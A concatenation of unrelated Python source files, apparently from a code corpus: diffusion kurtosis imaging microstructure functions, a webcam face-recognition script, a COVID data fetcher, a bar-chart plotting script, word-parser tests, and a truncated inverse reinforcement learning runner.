convergence procedure must be less than gtol before successful
termination. If gtol is None, fiber direction is directly taken from
the initial sampled directions of the given sphere object
mask : ndarray
A boolean array used to mark the coordinates in the data that should be
analyzed that has the shape dki_params.shape[:-1]
Returns
--------
awf : ndarray (x, y, z) or (n)
Axonal Water Fraction
References
----------
.. [1] <NAME>, <NAME>, <NAME>, 2011. White matter
characterization with diffusional kurtosis imaging.
Neuroimage 58(1):177-88. doi: 10.1016/j.neuroimage.2011.06.006
"""
kt_max = kurtosis_maximum(dki_params, sphere=sphere, gtol=gtol, mask=mask)
awf = kt_max / (kt_max + 3)
return awf
def diffusion_components(dki_params, sphere='repulsion100', awf=None,
mask=None):
""" Extracts the restricted and hindered diffusion tensors of well aligned
fibers from diffusion kurtosis imaging parameters [1]_.
Parameters
----------
dki_params : ndarray (x, y, z, 27) or (n, 27)
All parameters estimated from the diffusion kurtosis model.
Parameters are ordered as follows:
1) Three diffusion tensor's eigenvalues
2) Three lines of the eigenvector matrix each containing the first,
second and third coordinates of the eigenvector
3) Fifteen elements of the kurtosis tensor
sphere : Sphere class instance, optional
The sphere providing sample directions to sample the restricted and
hindered cellular diffusion tensors. For more details see Fieremans
et al., 2011.
awf : ndarray (optional)
Array containing values of the axonal water fraction that has the shape
dki_params.shape[:-1]. If not given this will be automatically computed
using :func:`axonal_water_fraction`" with function's default precision.
mask : ndarray (optional)
A boolean array used to mark the coordinates in the data that should be
analyzed that has the shape dki_params.shape[:-1]
Returns
--------
edt : ndarray (x, y, z, 6) or (n, 6)
Parameters of the hindered diffusion tensor.
idt : ndarray (x, y, z, 6) or (n, 6)
Parameters of the restricted diffusion tensor.
Note
----
In the original article of DKI microstructural model [1]_, the hindered and
restricted tensors were definde as the intra-cellular and extra-cellular
diffusion compartments respectively.
References
----------
.. [1] <NAME>, <NAME>, <NAME>, 2011. White matter
characterization with diffusional kurtosis imaging.
Neuroimage 58(1):177-88. doi: 10.1016/j.neuroimage.2011.06.006
"""
shape = dki_params.shape[:-1]
# load gradient directions
if not isinstance(sphere, dps.Sphere):
sphere = get_sphere(sphere)
# select voxels where to apply the single fiber model
if mask is None:
mask = np.ones(shape, dtype='bool')
else:
if mask.shape != shape:
raise ValueError("Mask is not the same shape as dki_params.")
else:
mask = np.array(mask, dtype=bool, copy=False)
# check or compute awf values
if awf is None:
awf = axonal_water_fraction(dki_params, sphere=sphere, mask=mask)
else:
if awf.shape != shape:
raise ValueError("awf array is not the same shape as dki_params.")
# Initialize hindered and restricted diffusion tensors
edt_all = np.zeros(shape + (6,))
idt_all = np.zeros(shape + (6,))
# Generate matrix that converts apparant diffusion coefficients to tensors
B = np.zeros((sphere.x.size, 6))
B[:, 0] = sphere.x * sphere.x # Bxx
B[:, 1] = sphere.x * sphere.y * 2. # Bxy
B[:, 2] = sphere.y * sphere.y # Byy
B[:, 3] = sphere.x * sphere.z * 2. # Bxz
B[:, 4] = sphere.y * sphere.z * 2. # Byz
B[:, 5] = sphere.z * sphere.z # Bzz
pinvB = np.linalg.pinv(B)
# Compute hindered and restricted diffusion tensors for all voxels
evals, evecs, kt = split_dki_param(dki_params)
dt = lower_triangular(vec_val_vect(evecs, evals))
md = mean_diffusivity(evals)
index = ndindex(mask.shape)
for idx in index:
if not mask[idx]:
continue
# sample apparent diffusion and kurtosis values
di = directional_diffusion(dt[idx], sphere.vertices)
ki = directional_kurtosis(dt[idx], md[idx], kt[idx], sphere.vertices,
adc=di, min_kurtosis=0)
edi = di * (1 + np.sqrt(ki * awf[idx] / (3.0 - 3.0 * awf[idx])))
edt = np.dot(pinvB, edi)
edt_all[idx] = edt
# We only move on if there is an axonal water fraction.
# Otherwise, remaining params are already zero, so move on
if awf[idx] == 0:
continue
# Convert apparent diffusion and kurtosis values to apparent diffusion
# values of the hindered and restricted diffusion
idi = di * (1 - np.sqrt(ki * (1.0 - awf[idx]) / (3.0 * awf[idx])))
# generate hindered and restricted diffusion tensors
idt = np.dot(pinvB, idi)
idt_all[idx] = idt
return edt_all, idt_all
def dkimicro_prediction(params, gtab, S0=1):
r""" Signal prediction given the DKI microstructure model parameters.
Parameters
----------
params : ndarray (x, y, z, 40) or (n, 40)
All parameters estimated from the diffusion kurtosis microstructure model.
Parameters are ordered as follows:
1) Three diffusion tensor's eigenvalues
2) Three lines of the eigenvector matrix each containing the
first, second and third coordinates of the eigenvector
3) Fifteen elements of the kurtosis tensor
4) Six elements of the hindered diffusion tensor
5) Six elements of the restricted diffusion tensor
6) Axonal water fraction
gtab : a GradientTable class instance
The gradient table for this prediction
S0 : float or ndarray
The non diffusion-weighted signal in every voxel, or across all
voxels. Default: 1
Returns
--------
S : (..., N) ndarray
Simulated signal based on the DKI microstructure model
Notes
-----
1) The predicted signal is given by:
$S(\theta, b) = S_0 * [f * e^{-b ADC_{r}} + (1-f) * e^{-b ADC_{h}]$, where
$ ADC_{r} and ADC_{h} are the apparent diffusion coefficients of the
diffusion hindered and restricted compartment for a given direction
$\theta$, $b$ is the b value provided in the GradientTable input for that
direction, $f$ is the volume fraction of the restricted diffusion
compartment (also known as the axonal water fraction).
2) In the original article of DKI microstructural model [1]_, the hindered
and restricted tensors were definde as the intra-cellular and
extra-cellular diffusion compartments respectively.
"""
# Initialize pred_sig
pred_sig = np.zeros(params.shape[:-1] + (gtab.bvals.shape[0],))
# Define dti design matrix and region to process
D = dti_design_matrix(gtab)
evals = params[..., :3]
mask = _positive_evals(evals[..., 0], evals[..., 1], evals[..., 2])
# Prepare parameters
f = params[..., 27]
adce = params[..., 28:34]
adci = params[..., 34:40]
if isinstance(S0, np.ndarray):
S0_vol = S0 * np.ones(params.shape[:-1])
else:
S0_vol = S0
# Process pred_sig for all data voxels
index = ndindex(evals.shape[:-1])
for v in index:
if mask[v]:
pred_sig[v] = (1. - f[v]) * np.exp(np.dot(D[:, :6], adce[v])) + \
f[v] * np.exp(np.dot(D[:, :6], adci[v]))
return pred_sig * S0_vol
def tortuosity(hindered_ad, hindered_rd):
""" Computes the tortuosity of the hindered diffusion compartment given
its axial and radial diffusivities
Parameters
----------
hindered_ad: ndarray
Array containing the values of the hindered axial diffusivity.
hindered_rd: ndarray
Array containing the values of the hindered radial diffusivity.
Return
------
Tortuosity of the hindered diffusion compartment
"""
if not isinstance(hindered_rd, np.ndarray):
hindered_rd = np.array(hindered_rd)
if not isinstance(hindered_ad, np.ndarray):
hindered_ad = np.array(hindered_ad)
tortuosity = np.zeros(hindered_rd.shape)
# mask to avoid divisions by zero
mask = hindered_rd > 0
# Check single voxel cases. For numpy versions more recent than 1.7,
# this if else condition is not required since single voxel can be
# processed using the same line of code of multi-voxel
if hindered_rd.size == 1:
if mask:
tortuosity = hindered_ad / hindered_rd
else:
tortuosity[mask] = hindered_ad[mask] / hindered_rd[mask]
return tortuosity
def _compartments_eigenvalues(cdt):
""" Helper function that computes the eigenvalues of a tissue sub
compartment given its individual diffusion tensor
Parameters
----------
cdt : ndarray (..., 6)
Diffusion tensors elements of the tissue compartment stored in lower
triangular order.
Returns
-------
eval : ndarry (..., 3)
Eigenvalues of the tissue compartment
"""
evals, evecs = decompose_tensor(from_lower_triangular(cdt))
return evals
class KurtosisMicrostructureModel(DiffusionKurtosisModel):
""" Class for the Diffusion Kurtosis Microstructural Model
"""
def __init__(self, gtab, fit_method="WLS", *args, **kwargs):
""" Initialize a KurtosisMicrostrutureModel class instance [1]_.
Parameters
----------
gtab : GradientTable class instance
fit_method : str or callable
str can be one of the following:
'OLS' or 'ULLS' to fit the diffusion tensor and kurtosis tensor
using the ordinary linear least squares solution
dki.ols_fit_dki
'WLS' or 'UWLLS' to fit the diffusion tensor and kurtosis tensor
using the ordinary linear least squares solution
dki.wls_fit_dki
callable has to have the signature:
fit_method(design_matrix, data, *args, **kwargs)
args, kwargs : arguments and key-word arguments passed to the
fit_method. See dki.ols_fit_dki, dki.wls_fit_dki for details
References
----------
.. [1] <NAME>., <NAME>., <NAME>., 2011. White Matter
Characterization with Diffusion Kurtosis Imaging. Neuroimage
58(1): 177-188. doi:10.1016/j.neuroimage.2011.06.006
"""
DiffusionKurtosisModel.__init__(self, gtab, fit_method="WLS", *args,
**kwargs)
def fit(self, data, mask=None, sphere='repulsion100', gtol=1e-2,
awf_only=False):
""" Fit method of the Diffusion Kurtosis Microstructural Model
Parameters
----------
data : array
An 4D matrix containing the diffusion-weighted data.
mask : array
A boolean array used to mark the coordinates in the data that
should be analyzed that has the shape data.shape[-1]
sphere : Sphere class instance, optional
The sphere providing sample directions for the initial search of
the maximal value of kurtosis.
gtol : float, optional
This input is to refine kurtosis maxima under the precision of the
directions sampled on the sphere class instance. The gradient of
the convergence procedure must be less than gtol before successful
termination. If gtol is None, fiber direction is directly taken
from the initial sampled directions of the given sphere object
awf_only : bool, optiomal
If set to true only the axonal volume fraction is computed from
the kurtosis tensor. Default = False
"""
if mask is not None:
# Check for valid shape of the mask
if mask.shape != data.shape[:-1]:
raise ValueError("Mask is not the same shape as data.")
mask = np.array(mask, dtype=bool, copy=False)
data_in_mask = np.reshape(data[mask], (-1, data.shape[-1]))
if self.min_signal is None:
self.min_signal = MIN_POSITIVE_SIGNAL
data_in_mask = np.maximum(data_in_mask, self.min_signal)
# DKI fit
dki_params = self.fit_method(self.design_matrix, data_in_mask,
*self.args, **self.kwargs)
# Computing awf
awf = axonal_water_fraction(dki_params, sphere=sphere, gtol=gtol)
if awf_only:
params_all_mask = np.concatenate((dki_params, np.array([awf]).T),
axis=-1)
else:
# Computing the hindered and restricted diffusion tensors
hdt, rdt = diffusion_components(dki_params, sphere=sphere,
awf=awf)
params_all_mask = np.concatenate((dki_params, np.array([awf]).T,
hdt, rdt), axis=-1)
if mask is None:
out_shape = data.shape[:-1] + (-1,)
params = params_all_mask.reshape(out_shape)
else:
params = np.zeros(data.shape[:-1] + (params_all_mask.shape[-1],))
params[mask, :] = params_all_mask
return KurtosisMicrostructuralFit(self, params)
def predict(self, params, S0=1.):
""" Predict a signal for the DKI microstructural model class instance
given parameters.
Parameters
----------
params : ndarray (x, y, z, 40) or (n, 40)
All parameters estimated from the diffusion kurtosis
microstructural model.
Parameters are ordered as follows:
1) Three diffusion tensor's eigenvalues
2) Three lines of the eigenvector matrix each containing the
first, second and third coordinates of the eigenvector
3) Fifteen elements of the kurtosis tensor
4) Six elements of the hindered diffusion tensor
5) Six elements of the restricted diffusion tensor
6) Axonal water fraction
S0 : float or ndarray (optional)
The non diffusion-weighted signal in every voxel, or across all
voxels. Default: 1
Note
-----
In the original article of DKI microstructural model [1]_, the hindered
and restricted tensors were definde as the intra-cellular and
extra-cellular diffusion compartments respectively.
References
----------
.. [1] <NAME>., <NAME>., <NAME>., 2011. White Matter
Characterization with Diffusion Kurtosis Imaging. Neuroimage
58(1): 177-188. doi:10.1016/j.neuroimage.2011.06.006
"""
return dkimicro_prediction(params, self.gtab, S0)
class KurtosisMicrostructuralFit(DiffusionKurtosisFit):
""" Class for fitting the Diffusion Kurtosis Microstructural Model """
def __init__(self, model, model_params):
""" Initialize a KurtosisMicrostructural Fit class instance.
Parameters
----------
model : DiffusionKurtosisModel Class instance
Class instance containing the Diffusion Kurtosis Model for the fit
model_params : ndarray (x, y, z, 40) or (n, 40)
All parameters estimated from the diffusion kurtosis
microstructural model.
Parameters are ordered as follows:
1) Three diffusion tensor's eigenvalues
2) Three lines of the eigenvector matrix each containing the
first, second and third coordinates of the eigenvector
3) Fifteen elements of the kurtosis tensor
4) Six elements of the hindered diffusion tensor
5) Six elements of the restricted diffusion tensor
6) Axonal water fraction
Note
-----
In the original article of DKI microstructural model [1]_, the hindered
and restricted tensors were definde as the intra-cellular and
extra-cellular diffusion compartments respectively.
References
----------
.. [1] <NAME>., <NAME>., <NAME>., 2011. White Matter
Characterization with Diffusion Kurtosis Imaging. Neuroimage
58(1): 177-188. doi:10.1016/j.neuroimage.2011.06.006
"""
DiffusionKurtosisFit.__init__(self, model, model_params)
@property
def awf(self):
""" Returns the volume fraction of the restricted diffusion compartment
also known as axonal water fraction.
Note
----
The volume fraction of the restricted diffusion compartment can be seem
as the volume fraction of the intra-cellular compartment [1]_.
References
----------
.. [1] <NAME>., <NAME>., <NAME>., 2011. White Matter
Characterization with Diffusion Kurtosis Imaging. Neuroimage
58(1): 177-188. doi:10.1016/j.neuroimage.2011.06.006
"""
return self.model_params[..., 27]
@property
def restricted_evals(self):
""" Returns the eigenvalues of the restricted diffusion compartment.
Note
-----
The restricted diffusion tensor can be seem as the tissue's
intra-cellular diffusion compartment [1]_.
References
----------
.. [1] <NAME>., <NAME>., <NAME>., 2011. White Matter
Characterization with Diffusion Kurtosis Imaging. Neuroimage
58(1): 177-188. doi:10.1016/j.neuroimage.2011.06.006
"""
self._is_awfonly()
return _compartments_eigenvalues(self.model_params[..., 34:40])
@property
def hindered_evals(self):
""" Returns the eigenvalues of the hindered diffusion compartment.
Note
-----
The hindered diffusion tensor can be seem as the tissue's
extra-cellular diffusion compartment [1]_.
References
----------
.. [1] <NAME>., <NAME>., <NAME>., 2011. White Matter
Characterization with Diffusion Kurtosis Imaging. Neuroimage
58(1): 177-188. doi:10.1016/j.neuroimage.2011.06.006
"""
self._is_awfonly()
return _compartments_eigenvalues(self.model_params[..., 28:34])
@property
def axonal_diffusivity(self):
""" Returns the axonal diffusivity defined as the restricted diffusion
tensor trace [1]_.
References
----------
.. [1] <NAME>., <NAME>., <NAME>., 2011. White Matter
Characterization with Diffusion Kurtosis Imaging. Neuroimage
58(1): 177-188. doi:10.1016/j.neuroimage.2011.06.006
"""
return trace(self.restricted_evals)
@property
def hindered_ad(self):
""" Returns the axial diffusivity of the hindered compartment.
Note
-----
The hindered diffusion tensor can be seem as the tissue's
extra-cellular diffusion compartment [1]_.
References
----------
.. [1] <NAME>., <NAME>., <NAME>., 2011. White Matter
Characterization with Diffusion Kurtosis Imaging. Neuroimage
58(1): 177-188. doi:10.1016/j.neuroimage.2011.06.006
"""
return axial_diffusivity(self.hindered_evals)
@property
def hindered_rd(self):
""" Returns the radial diffusivity of the hindered compartment.
Note
-----
The hindered diffusion tensor can be seem as the tissue's
extra-cellular diffusion compartment [1]_.
References
----------
.. [1] <NAME>., <NAME>., <NAME>., 2011. White Matter
Characterization with Diffusion Kurtosis Imaging. Neuroimage
58(1): 177-188. doi:10.1016/j.neuroimage.2011.06.006
"""
return radial_diffusivity(self.hindered_evals)
@property
def tortuosity(self):
""" Returns the tortuosity of the hindered diffusion which is defined
by ADe / RDe, where ADe and RDe are the axial and radial diffusivities
of the hindered compartment [1]_.
Note
-----
The hindered diffusion tensor can be seem as the tissue's
extra-cellular diffusion compartment [1]_.
References
----------
.. [1] <NAME>., <NAME>., <NAME>., 2011. White Matter
Characterization with Diffusion Kurtosis Imaging. Neuroimage
58(1): 177-188. doi:10.1016/j.neuroimage.2011.06.006
"""
return tortuosity(self.hindered_ad, self.hindered_rd)
def _is_awfonly(self):
""" To raise error if only the axonal water fraction was computed """
if self.model_params.shape[-1] < 39:
raise ValueError('Only the awf was processed! Rerun model fit '
'with input parameter awf_only set to False')
def predict(self, gtab, S0=1.):
r""" Given a DKI microstructural model fit, predict the signal on the
vertices of a gradient table
gtab : a GradientTable class instance
The gradient table for this prediction
S0 : float or ndarray (optional)
The non diffusion-weighted signal in every voxel, or across all
voxels. Default: 1
Notes
-----
The predicted signal is given by:
$S(\theta, b) = S_0 * [f * e^{-b ADC_{r}} + (1-f) * e^{-b ADC_{h}]$,
where $ADC_{r}$ and $ADC_{h}$ are the apparent diffusion coefficients
of the diffusion hindered and restricted compartment for a given
direction $\theta$, $b$ is the b value provided in the GradientTable
input for that direction, $f$ is the volume fraction of the restricted
diffusion compartment (also known as the axonal water fraction).
"""
self._is_awfonly()
return dkimicro_prediction(self.model_params, gtab, S0)
| 2.671875 | 3 |
face_recognize.py | nadeengamage/face-recognition | 0 | 12786468 | import cv2, sys, os
import numpy as np
haar_file = 'haarcascade_frontalface_default.xml'
datasets = 'datasets'
print('Recognizing Face Please Be in sufficient Lights...')
(images, lables, names, id) = ([], [], {}, 0)
for (subdirs, dirs, files) in os.walk(datasets):
for subdir in dirs:
names[id] = subdir
subjectpath = os.path.join(datasets, subdir)
for filename in os.listdir(subjectpath):
path = subjectpath + '/' + filename
lable = id
images.append(cv2.imread(path, 0))
lables.append(int(lable))
id += 1
(width, height) = (130, 100)
(images, lables) = [np.array(lis) for lis in [images, lables]]
model = cv2.face.LBPHFaceRecognizer_create()
model.train(images, lables)
face_cascade = cv2.CascadeClassifier(haar_file)
webcam = cv2.VideoCapture(0)
while True:
(_, im) = webcam.read()
(_, im2) = webcam.read()
gray = cv2.cvtColor(im, cv2.COLOR_BGR2GRAY)
faces = face_cascade.detectMultiScale(gray, 1.3, 5)
hsv = cv2.cvtColor(im, cv2.COLOR_BGR2HSV)
lower_blue = np.array([110,50,50])
upper_blue = np.array([130,255,255])
for (x, y, w, h) in faces:
cv2.rectangle(gray, (x, y), (x + w, y + h), (255, 0, 0), 2)
cv2.rectangle(im, (x, y), (x + w, y + h), (255, 0, 0), 2)
face = gray[y:y + h, x:x + w]
face_resize = cv2.resize(face, (width, height))
prediction = model.predict(face_resize)
cv2.rectangle(gray, (x, y), (x + w, y + h), (0, 255, 0), 3)
cv2.rectangle(im, (x, y), (x + w, y + h), (0, 255, 0), 3)
if prediction[1]<100:
cv2.putText(gray, 'The person of % s - %.0f' %(names[prediction[0]], prediction[1]), (x-10, y-10), cv2.FONT_HERSHEY_PLAIN, 1, (0, 0, 255), 2)
cv2.putText(im, 'The person of % s - %.0f' %(names[prediction[0]], prediction[1]), (x-10, y-10), cv2.FONT_HERSHEY_PLAIN, 1, (0, 0, 255), 2)
else:
cv2.putText(gray, 'Not Recognized', (x-10, y-10), cv2.FONT_HERSHEY_PLAIN, 1, (0, 0, 255), 2)
cv2.putText(im, 'Not Recognized', (x-10, y-10), cv2.FONT_HERSHEY_PLAIN, 1, (0, 0, 255), 2)
mask = cv2.inRange(hsv, lower_blue, upper_blue)
cv2.imshow('Window 1', im)
cv2.imshow('Window 2', im2)
cv2.imshow('Window 3', gray)
cv2.imshow('Window 4', mask)
key = cv2.waitKey(10)
if key == 27:
cv2.destroyAllWindows()
break
| 2.734375 | 3 |
autumn/tools/inputs/covid_au/fetch.py | monash-emu/AuTuMN | 14 | 12786469 | <filename>autumn/tools/inputs/covid_au/fetch.py
"""
This file imports Google mobility data and saves it to disk as a CSV.
"""
import os
import pandas as pd
from autumn.settings import INPUT_DATA_PATH
# From covid19data.com.au GitHub https://github.com/M3IT/COVID-19_Data
DATA_URL = "https://raw.githubusercontent.com/M3IT/COVID-19_Data/master/Data/COVID_AU_state_daily_change.csv"
COVID_AU_DIRPATH = os.path.join(INPUT_DATA_PATH, "covid_au")
COVID_AU_CSV_PATH = os.path.join(COVID_AU_DIRPATH, "COVID_AU_state_daily_change.csv")
YOUGOV_URL = "https://github.com/YouGov-Data/covid-19-tracker/raw/master/data/australia.zip"
COVID_AU_YOUGOV = os.path.join(COVID_AU_DIRPATH, "yougov_australia.csv")
COVID_LGA_CSV_PATH = os.path.join(COVID_AU_DIRPATH, "lga_test.csv")
MOBILITY_DIRPATH = os.path.join(INPUT_DATA_PATH, "mobility")
MOBILITY_LGA_PATH = os.path.join(
MOBILITY_DIRPATH, "LGA to Cluster mapping dictionary with proportions.csv"
)
COVID_VAC_COV_CSV = os.path.join(COVID_AU_DIRPATH, "vac_cov.csv")
COVID_VIDA_VAC_CSV = os.path.join(COVID_AU_DIRPATH, "vida_vac.secret.csv")
COVID_VIDA_POP_CSV = os.path.join(COVID_AU_DIRPATH, "vida_pop.csv")
CLUSTER_MAP = {
1: "NORTH_METRO",
2: "SOUTH_EAST_METRO",
3: "SOUTH_METRO",
4: "WEST_METRO",
5: "BARWON_SOUTH_WEST",
6: "GIPPSLAND",
7: "GRAMPIANS",
8: "HUME",
9: "LODDON_MALLEE",
0: "VIC",
}
def fetch_covid_au_data():
pd.read_csv(DATA_URL).to_csv(COVID_AU_CSV_PATH)
pd.read_csv(YOUGOV_URL).to_csv(COVID_AU_YOUGOV)
| 2.703125 | 3 |
diabetesmanager/__init__.py | diabetes-manager/data-science | 0 | 12786470 | <gh_stars>0
"""Entry point for Diabetes Manager flask application."""
from .app import create_app
APP = create_app()
| 1.03125 | 1 |
draw_bar.py | IndexFziQ/nn4nlp-concepts | 440 | 12786471 | # import libraries
import matplotlib
matplotlib.use('Agg')
import pandas as pd
import matplotlib.pyplot as plt
import argparse
from collections import defaultdict
#%matplotlib inline
# set font
plt.rcParams['font.family'] = 'sans-serif'
plt.rcParams['font.sans-serif'] = 'Helvetica'
# set the style of the axes and the text color
plt.rcParams['axes.edgecolor']='#333F4B'
plt.rcParams['axes.linewidth']=0.8
plt.rcParams['xtick.color']='#333F4B'
plt.rcParams['ytick.color']='#333F4B'
plt.rcParams['text.color']='#333F4B'
parser = argparse.ArgumentParser(description='Draw Bar')
parser.add_argument('--tsv', default='input.tsv', help='input file separted by \'\\t\' ')
parser.add_argument('--fig', default='out.png', help='the output figure')
parser.add_argument('--title', default='Concept Count in All Papers', help='the title of the graph')
parser.add_argument('--colored_concepts', default=None, nargs='+',
help='An interleaved list of filenames containing concept tags (e.g. first.txt red second.txt purple)')
args = parser.parse_args()
concept_colors = defaultdict(lambda: '#007ACC')
if args.colored_concepts:
for i in range(0, len(args.colored_concepts), 2):
print(f"opening {args.colored_concepts[i]} as {args.colored_concepts[i+1]}")
with open(args.colored_concepts[i], 'r') as f:
for line in f:
line = line.strip()
concept_colors[line] = args.colored_concepts[i+1]
print(f'concept_colors[{line}] = {args.colored_concepts[i+1]}')
tsv_file = args.tsv
fig_file = args.fig
fin = open(tsv_file,"r")
cpt_list = []
val_list = []
for line in fin:
line = line.strip()
cpt, val = line.split("\t")
val_list.append(int(val))
cpt_list.append(cpt)
fin.close()
percentages = pd.Series(val_list,
index=cpt_list)
df = pd.DataFrame({'percentage' : percentages})
df = df.sort_values(by='percentage')
color_list = [concept_colors[x] for x in df.index]
# we first need a numeric placeholder for the y axis
my_range=list(range(1,len(df.index)+1))
fig, ax = plt.subplots(figsize=(10,25))
# create lines and dots for each bar
plt.hlines(y=my_range, xmin=0, xmax=df['percentage'], colors=color_list, alpha=0.5, linewidth=5)
# plt.plot(df['percentage'], my_range, "o", markersize=5, colors=color_list, alpha=0.6)
# set labels
ax.set_xlabel(args.title, fontsize=15, fontweight='black', color = '#333F4B')
ax.xaxis.set_label_position('top')
ax.xaxis.tick_top()
#ax.set_ylabel('')
# set axis
ax.tick_params(axis='both', which='major', labelsize=12)
plt.yticks(my_range, df.index)
# add an horizonal label for the y axis
#fig.text(-0.23, 0.86, 'Concept Coverage (Fulltext)', fontsize=15, fontweight='black', color = '#333F4B')
# change the style of the axis spines
ax.spines['bottom'].set_color('none')
ax.spines['right'].set_color('none')
ax.spines['left'].set_smart_bounds(True)
ax.spines['top'].set_smart_bounds(True)
'''
# set the spines position
ax.spines['bottom'].set_position(('axes', -0.04))
ax.spines['left'].set_position(('axes', 0.015))
'''
plt.savefig(fig_file, dpi=300, bbox_inches='tight')
| 2.765625 | 3 |
tests/test_online_attributes.py | anetschka/duden | 0 | 12786472 | <filename>tests/test_online_attributes.py
# -*- coding: utf-8 -*-
"""
Test if words currently available online parse as expected
"""
import os
from collections import namedtuple
import pytest
import yaml
from duden.search import get
TEST_DATA_DIR = 'tests/test_data'
WordTestRecord = namedtuple('WordTestRecord', ["parsed_word", "expected_dict"])
def generate_word_data():
"""
Download actual words from duden corresponding to test words from `TEST_DATA_DIR`
"""
data = []
for filename in os.listdir(TEST_DATA_DIR):
full_path = os.path.join(TEST_DATA_DIR, filename)
# read only yaml files
if not filename.endswith('.yaml'):
continue
# store real and expected result
with open(full_path, 'r') as f:
expected_dict = yaml.load(f, Loader=yaml.SafeLoader)
parsed_word = get(expected_dict['urlname'])
record = WordTestRecord(parsed_word, expected_dict)
data.append(record)
return data
# set up test parameters matrix
word_data = generate_word_data()
basic_attributes = [
'title', 'name', 'article', 'part_of_speech', 'frequency', 'usage',
'word_separation', 'synonyms', 'origin', 'words_before', 'words_after'
]
word_param = pytest.mark.parametrize("parsed_word,expected_dict", word_data)
attribute_param = pytest.mark.parametrize("attribute", basic_attributes)
@word_param
@attribute_param
def test_basic_attributes(parsed_word, expected_dict, attribute):
"""Test basic word attributes"""
assert getattr(parsed_word, attribute) == expected_dict[attribute]
@word_param
def test_meaning_overview(parsed_word, expected_dict):
"""Test meaning overview attribute"""
assert parsed_word.meaning_overview == expected_dict['meaning_overview']
@word_param
def test_word_compounds(parsed_word, expected_dict):
"""Test word compounds attribute"""
parsed = parsed_word.compounds
expected = expected_dict['compounds']
if parsed == expected == None: # noqa
return
assert parsed.keys() == expected.keys()
if 'substantive' in expected:
assert set(parsed['substantive']) == set(expected['substantive'])
if 'verben' in expected:
assert set(parsed['verben']) == set(expected['verben'])
if 'adjektive' in expected:
assert set(parsed['adjektive']) == set(expected['adjektive'])
@word_param
def test_word_grammar(parsed_word, expected_dict):
"""Test word grammar"""
expected_grammar = expected_dict['grammar_raw']
if expected_grammar is not None:
expected_grammar = [(set(tags), string)
for tags, string in expected_grammar]
assert parsed_word.grammar_raw == expected_grammar
| 2.78125 | 3 |
runner.py | erensezener/aima-based-irl | 12 | 12786473 | """
Author: <NAME> (<EMAIL>)
Date: April 4, 2014
Description: Runs the BIRL algorithm multiple times.
Status: Works correctly.
Dependencies:
Known bugs: -
"""
# from birl import *
from functools import partial
import matplotlib.pyplot as plt
import numpy as np
import matplotlib.gridspec as gridspec
from modified_birl import *
def main():
number_of_iterations = 10
# expert_mdp = GridMDP([[-10, -5, 0, 0, 10],
# [-5, -3, 0, 0, 0],
# [0, 0, 0, 0, 0],
# [0, 0, 0, 0, 0]],
# terminals=[(4,3)])
# expert_mdp = GridMDP([[-10, -5, -3, -1, 0, 0, 0, 0, 0, 10],
# [-8, -5, -3, 0, 0, 0, 0, 0, 0, 0],
# [-5, -2, -1, 0, 0, 0, 0, 0, 0, 0],
# [-3, -1, 0, 0, 0, 0, 0, 0, 0, 0],
# [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]],
# terminals=[(9,4)])
#
# expert_mdp = GridMDP([[0, 0, 0, 0, -1, -1, 0, 0, 0, 10],
# [0, 0, 0, -3, -3, -3, -3, 0, 0, 0],
# [0, 0, 0, -3, -5, -5, -3, 0, 0, 0],
# [0, 0, 0, -3, -3, -3, -3, 0, 0, 0],
# [0, 0, 0, 0, 0, -1, -1, 0, 0, 0]],
# terminals=[(9,4)])
#
# rewards = [[0, 0, 0, 0, -1, -1, 0, 0, 0, 10],
# [0, 0, 0, -3, -3, -3, -3, 0, 0, 0],
# [0, 0, 0, -3, -5, -5, -3, 0, 0, 0],
# [0, 0, 0, -3, -3, -3, -3, 0, 0, 0],
# [0, 0, 0, 0, 0, -1, -1, 0, 0, 0]]
#
rewards = [[0, 0, 0, 0, -8, -8, 0, 0, 0, 10],
[0, 0, 0, -8, -10, -10, -8, 0, 0, 0],
[0, 0, 0, -8, -10, -10, -8, 0, 0, 0],
[0, 0, 0, -8, -10, -10, -8, 0, 0, 0],
[0, 0, 0, 0, 0, -8, -8, 0, 0, 0]]
# rewards = [[-6, -3, -1, 0, 0, 0, 0, 0, 0, 10],
# [-3, -3, -1, 0, 0, 0, 0, 0, 0, 0],
# [-1, -1, -1, 0, 0, 0, 0, -1, -1, -1],
# [0, 0, 0, 0, 0, 0, 0, -1, -3, -3],
# [0, 0, 0, 0, 0, 0, 0, -1, -3, -6]]
#
# rewards = [[0, 0, 0, 0, 0, 0, 0, 0, 0, -3, -3, -3, -3, 0, 0, 0, 0, 0, 10],
# [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -3, -3, -3, -3, 0, 0, 0, 0, 0],
# [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -3, -3, -3, -3, 0, 0, 0, 0, 0],
# [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -3, -3, -3, -3, 0, 0, 0, 0, 0],
# [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -3, -3, -3, -3, 0, 0, 0, 0, 0],
# [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -3, -3, -3, -3, 0, 0, 0, 0, 0],
# [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
# [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -3, -3, -3, 0, 0, 0, 0, 0, 0],
# [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -3, -3, -3, 0, 0, 0, 0, 0, 0],
# [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -3, -3, -3, 0, 0, 0, 0, 0, 0]]
expert_mdp = GridMDP(rewards,
terminals=[(9, 4)])
expert_trace = best_policy(expert_mdp, value_iteration(expert_mdp, 0.001))
print "Expert rewards:"
expert_mdp.print_rewards()
print "Expert policy:"
print_table(expert_mdp.to_arrows(expert_trace))
print "---------------"
expert_trace.pop((0,1))
expert_trace.pop((0,2))
expert_trace.pop((0,3))
birl = ModifiedBIRL(expert_trace, expert_mdp.get_grid_size(), expert_mdp.terminals,
partial(calculate_error_sum, expert_mdp), birl_iteration=2, step_size=1.0)
run_multiple_birl(birl, expert_mdp, expert_trace, number_of_iterations)
def plot_errors(policy_error, reward_error, directory_name, birl, i, expert_mdp, mdp):
gs = gridspec.GridSpec(3, 2)
ax0 = plt.subplot(gs[0, :-1])
ax1 = plt.subplot(gs[0, -1])
ax2 = plt.subplot(gs[1, :])
ax3 = plt.subplot(gs[2, :])
expert_data = np.array(expert_mdp.get_grid())
ax0.pcolor(expert_data, cmap=plt.cm.RdYlGn)
